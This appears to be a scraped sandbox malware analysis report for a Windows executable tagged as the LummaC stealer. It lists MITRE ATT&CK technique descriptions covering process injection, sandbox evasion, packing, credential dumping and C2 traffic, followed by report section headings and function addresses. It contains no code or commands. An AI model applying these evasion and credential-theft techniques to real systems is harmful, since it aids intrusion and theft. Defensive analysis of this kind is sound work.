Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ZX2M0AXZ56.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
ZX2M0AXZ56.exe

Function 004D1D00 Relevance: 26.8, Strings: 21, Instructions: 506
COMMON

Function 004E9280 Relevance: 23.4, APIs: 5, Strings: 8, Instructions: 661
memoryCOMMON

Function 004C1227 Relevance: 16.5, APIs: 1, Strings: 8, Instructions: 750
COMMON

Function 004E8EA0 Relevance: 15.3, Strings: 12, Instructions: 287
COMMON

Function 004B8600 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 356
COMMON

Function 004DD34A Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 398
COMMON

Function 004F0D20 Relevance: 2.9, Strings: 2, Instructions: 425
COMMON

Function 004B9D1E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 142
libraryCOMMON

Function 004DD7EE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85
COMMON